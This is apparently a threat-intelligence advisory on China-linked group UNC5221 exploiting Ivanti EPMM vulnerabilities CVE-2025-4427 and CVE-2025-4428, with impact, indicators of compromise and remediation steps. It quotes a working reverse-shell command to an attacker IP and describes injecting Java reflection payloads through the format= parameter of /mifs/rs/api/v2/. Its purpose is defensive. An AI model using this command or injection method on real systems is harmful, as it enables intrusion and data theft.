Analysis Summary

A highly sophisticated cyber-espionage campaign, attributed to the China-linked group UNC5221, has been exploiting critical zero-day vulnerabilities in Ivanti Endpoint Manager Mobile (EPMM) since May 15, 2025. The attackers are leveraging CVE-2025-4427 and CVE-2025-4428, which together allow unauthenticated remote code execution, targeting high-value sectors such as healthcare, telecommunications, aviation, finance, municipal governance, and defense. 

The exploitation has impacted organizations across Europe, North America, and the Asia-Pacific region, including UK healthcare trusts, Scandinavian municipal agencies, U.S. medical device manufacturers, German telecom providers, and Japanese automotive suppliers. The attackers specifically target enterprises managing large mobile device fleets, exploiting EPMM’s central role in device management to potentially compromise thousands of endpoints.

According to the Researcher, UNC5221 demonstrates a deep understanding of EPMM's internal architecture, repurposing legitimate system components to exfiltrate sensitive data such as personally identifiable information (PII), authentication credentials, and confidential organizational assets. The group has deployed advanced malware like KrustyLoader, which retrieves encrypted Sliver backdoors from AWS S3 buckets, as well as Fast Reverse Proxy (FRP) tools for persistent access and lateral movement. This operational sophistication and broad targeting suggest a state-sponsored agenda focused on long-term espionage and data collection rather than immediate financial gain.

Initial access is achieved through a critical unauthenticated RCE vulnerability in the /mifs/rs/api/v2/ endpoint, where attackers inject malicious Java-based payloads via the format= parameter. These payloads use complex Java reflection techniques embedded in HTTP GET requests to invoke Runtime.getRuntime().exec(), allowing arbitrary command execution. For instance, commands like bash -i >& /dev/tcp/64.52.80.21/4444 0>&1 establish reverse shells for remote command-line access. The threat actors maintain communication channels by ensuring injected Java threads remain active until processes complete, thus preserving their control over compromised systems.

To enhance their foothold and gather command output in real time, the attackers employ dual Java injection methods. In addition to executing commands, they use Scanner objects to capture the output directly from the executed processes. This approach allows immediate feedback and reliable command-and-control operations via server-side Java injection. The rapid weaponization of new vulnerabilities, coupled with the precision and scale of the intrusions, underscores UNC5221’s advanced capabilities and strategic intent, making this one of the most significant global espionage campaigns of 2025.

Impact

• Sensitive Credential Theft
• Information Disclosure
• Code Execution
• Gain Access
• Financial Loss

Indicators of Compromise

SHA1

• 01b9389c2b893e26bf0ed8016a8f0c90b23bb570

• be74bcf828d51b2e7ac9712de2735822cfae1ae1

• c21d573b7df6902fd0f7f107b8b66bfc8c4e9784

• 02771bdf245d93924310a042df46e7626ec5ec30

URL

• https://dpaste.com/9MQEJ6VYR.txt

Remediation

• Block all threat indicators at your respective controls.
• Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
• Immediately apply security updates as provided by Ivanti.
• Temporarily remove any exposed or unpatched EPMM systems from the internet-facing network segments.
• Look for suspicious activity on the /mifs/rs/api/v2/ endpoint, especially with anomalous format= parameters or Base64-encoded payloads.
• Deploy IDS/IPS signatures to detect Sliver backdoor traffic, reverse shells (e.g., bash -i patterns), and use of Fast Reverse Proxy (FRP).
• Watch for unusual connections to IPs such as 64.52.80.21 or unexplained traffic to AWS S3 buckets.
• Identify and hunt for indicators related to KrustyLoader, Sliver, and Java-based reflection payloads.
• Investigate systems for unauthorized command execution, reverse shell artifacts, and encoded payloads in Java processes.
• Look for attempts to gain higher access levels post-exploitation.
• Ensure management interfaces like EPMM are behind VPNs or restricted via firewall rules.
• Disable Java reflection where possible and sanitize user input rigorously.
• Implement micro-segmentation to reduce lateral movement opportunities in case of a breach.
• Verify all user and device actions continuously and enforce least privilege access.
• Establish a proactive vulnerability management process for all critical infrastructure components.
• Test detection and response capabilities against simulated Java RCE and lateral movement scenarios.